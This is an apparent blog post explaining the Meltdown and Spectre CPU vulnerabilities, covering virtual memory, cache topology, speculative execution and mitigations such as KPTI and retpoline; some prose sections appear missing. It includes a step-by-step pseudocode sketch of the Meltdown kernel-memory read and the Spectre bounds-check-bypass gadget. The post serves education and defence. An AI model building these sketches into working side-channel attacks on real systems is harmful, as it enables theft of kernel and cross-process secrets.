Meltdown and Spectre, explained

Background

Virtual memory

Figure 1: Virtual memory
Figure 2: Virtual memory translation
  1. A program fetches a virtual address.
  2. The CPU attempts to translate it using the TLB. If the address is found, the translation is used.
  3. If the address is not found, the CPU consults a set of “page tables” to determine the mapping. Page tables are a set of physical memory pages provided by the operating system in a location the hardware can find them (for example the CR3 register on x86 hardware). Page tables map virtual addresses to physical addresses, and also contain metadata such as permissions.
  4. If the page table contains a mapping it is returned, cached in the TLB, and used for lookup. If the page table does not contain a mapping, a “page fault” is raised to the OS. A page fault is a special kind of interrupt that allows the OS to take control and determine what to do when there is a missing or invalid mapping. For example, the OS might terminate the program. It might also allocate some physical memory and map it into the process. If a page fault handler continues execution, the new mapping will be used by the TLB.
Figure 3: User/kernel virtual memory mappings
  • Kernel memory is shown in red. It is contained in physical address range 0–99. Kernel memory is special memory that only the operating system should be able to access. User programs should not be able to access it.
  • User memory is shown in gray.
  • Unallocated physical memory is shown in blue.
  • User memory in each process is in the virtual range 0–99, but backed by different physical memory.
  • Kernel memory in each process is in the virtual range 100–199, but backed by the same physical memory.

CPU cache topology

Figure 4: CPU thread, core, package, and cache topology.
  • The basic unit of execution is the “CPU thread” or “hardware thread” or “hyper-thread.” Each CPU thread contains a set of registers and the ability to execute a stream of machine code, much like a software thread.
  • CPU threads are contained within a “CPU core.” Most modern CPUs contain two threads per core.
  • Modern CPUs generally contain multiple levels of cache memory. The cache levels closer to the CPU thread are smaller, faster, and more expensive. The further away from the CPU and closer to main memory the cache is the larger, slower, and less expensive it is.
  • Typical modern CPU design uses an L1/L2 cache per core. This means that each CPU thread on the core makes use of the same caches.
  • Multiple CPU cores are contained in a “CPU package.” Modern CPUs might contain upwards of 30 cores (60 threads) or more per package.
  • All of the CPU cores in the package typically share an L3 cache.
  • CPU packages fit into “sockets.” Most consumer computers are single socket while many datacenter servers have multiple sockets.

Speculative execution

Figure 5: Modern CPU execution engine (Source: Google images)
if (x < array1_size) {
y = array2[array1[x] * 256];
}
class Base {
public:
virtual void Foo() = 0;
};
class Derived : public Base {
public:
void Foo() override { … }
};
Base* obj = new Derived;
obj->Foo();

Meltdown vulnerability

Rogue data cache load

1. uint8_t* probe_array = new uint8_t[256 * 4096];
2. // ... Make sure probe_array is not cached
3. uint8_t kernel_memory = *(uint8_t*)(kernel_address);
4. uint64_t final_kernel_memory = kernel_memory * 4096;
5. uint8_t dummy = probe_array[final_kernel_memory];
6. // ... catch page fault
7. // ... determine which of 256 slots in probe_array is cached
  1. In the first line, a “probe array” is allocated. This is memory in our process which is used as a side channel to retrieve data from the kernel. How this is done will become apparent soon.
  2. Following the allocation, the attacker makes sure that none of the memory in the probe array is cached. There are various ways of accomplishing this, the simplest of which includes CPU-specific instructions to clear a memory location from cache.
  3. The attacker then proceeds to read a byte from the kernel’s address space. Remember from our previous discussion about virtual memory and page tables that all modern kernels typically map the entire kernel virtual address space into the user process. Operating systems rely on the fact that each page table entry has permission settings, and that user mode programs are not allowed to access kernel memory. Any such access will result in a page fault. That is indeed what will eventually happen at step 3.
  4. However, modern processors also perform speculative execution and will execute ahead of the faulting instruction. Thus, steps 3–5 may execute in the CPU’s pipeline before the fault is raised. In this step, the byte of kernel memory (which ranges from 0–255) is multiplied by the page size of the system, which is typically 4096.
  5. In this step, the multiplied byte of kernel memory is then used to read from the probe array into a dummy value. The multiplication of the byte by 4096 is to avoid a CPU feature called the “prefetcher” from reading more data than we want into into the cache.
  6. By this step, the CPU has realized its mistake and rolled back to step 3. However, the results of the speculated instructions are still visible in cache. The attacker uses operating system functionality to trap the faulting instruction and continue execution (e.g., handling SIGFAULT).
  7. In step 7, the attacker iterates through and sees how long it takes to read each of the 256 possible bytes in the probe array that could have been indexed by the kernel memory. The CPU will have loaded one of the locations into cache and this location will load substantially faster than all the other locations (which need to be read from main memory). This location is the value of the byte in kernel memory.

Meltdown mitigations

Kernel page table isolation (KPTI)

Figure 6: Kernel page table isolation

Spectre vulnerability

Bounds check bypass (Spectre variant 1)

if (x < array1_size) {
y = array2[array1[x] * 256];
}
  1. The attacker controls x.
  2. array1_size is not cached.
  3. array1 is cached.
  4. The CPU guesses that x is less than array1_size. (CPUs employ various proprietary algorithms and heuristics to determine whether to speculate, which is why attack details for Spectre vary between processor vendors and models.)
  5. The CPU executes the body of the if statement while it is waiting for array1_size to load, affecting the cache in a similar manner to Meltdown.
  6. The attacker can then determine the actual value of array1[x] via one of various methods. (See the research paper for more details of cache inference attacks.)

Branch target injection (Spectre variant 2)

Spectre mitigations

Static analysis and fencing (variant 1 mitigation)

Retpoline (variant 2 mitigation)

jmp *%r11
call set_up_target;  (1)
capture_spec: (4)
pause;
jmp capture_spec;
set_up_target:
mov %r11, (%rsp); (2)
ret; (3)
  1. In this step the code calls a memory location that is known at compile time so is a hard coded offset and not indirect. This places the return address of capture_spec on the stack.
  2. The return address from the call is overwritten with the actual jump target.
  3. A return is performed on the real target.
  4. When the CPU speculatively executes, it will return into an infinite loop! Remember that the CPU will speculate ahead until memory loads are complete. In this case, the speculation has been manipulated to be captured into an infinite loop that has no side effects that are observable to an attacker. When the CPU eventually executes the real return it will abort the speculative execution which had no effect.

IBRS, STIBP, and IBPB (variant 2 mitigation)

  • Indirect Branch Restricted Speculation (IBRS)
  • Single Thread Indirect Branch Predictors (STIBP)
  • Indirect Branch Predictor Barrier (IBPB)
  • IBRS both flushes the branch prediction cache between privilege levels (user to kernel) and disables branch prediction on the sibling CPU thread. Recall that each CPU core typically has two CPU threads. It appears that on modern CPUs the branch prediction hardware is shared between the threads. This means that not only can user mode code poison the branch predictor prior to entering kernel code, code running on the sibling CPU thread can also poison it. Enabling IBRS while in kernel mode essentially prevents any previous execution in user mode and any execution on the sibling CPU thread from affecting branch prediction.
  • STIBP appears to be a subset of IBRS that just disables branch prediction on the sibling CPU thread. As far as I can tell, the main use case for this feature is to prevent a sibling CPU thread from poisoning the branch predictor when running two different user mode processes (or virtual machines) on the same CPU core at the same time. It’s honestly not completely clear to me right now when STIBP should be used.
  • IBPB appears to flush the branch prediction cache for code running at the same privilege level. This can be used when switching between two user mode programs or two virtual machines to ensure that the previous code does not interfere with the code that is about to run (though without STIBP I believe that code running on the sibling CPU thread could still poison the branch predictor).

Conclusion

Further reading

--

--

--

Engineer @lyft (https://mattklein123.dev/)

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

The Problem with End-to-End Tests

Fake Code Review with ‘LGTM’

10 Best Pieces of Advice for Becoming a Successful Junior Developer

Software Configuration Management

Meet Innovation Challenge Winner Ana Felisatti

Why You Should Check Out Hasura’s GraphQL Engine

Hasura mascot

7 Out-of-the-Box Use Cases for AWS Lambda

Firebase, Spend More Time Developing The Features That Actually Matter

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Matt Klein

Matt Klein

Engineer @lyft (https://mattklein123.dev/)

More from Medium

Verifying EFA is enabled on a SageMaker Training job

Leetcode`s ‘add digits’ problem solution.

Launch Control at Nextdoor

3 Ways You Save By Optimizing ML Compute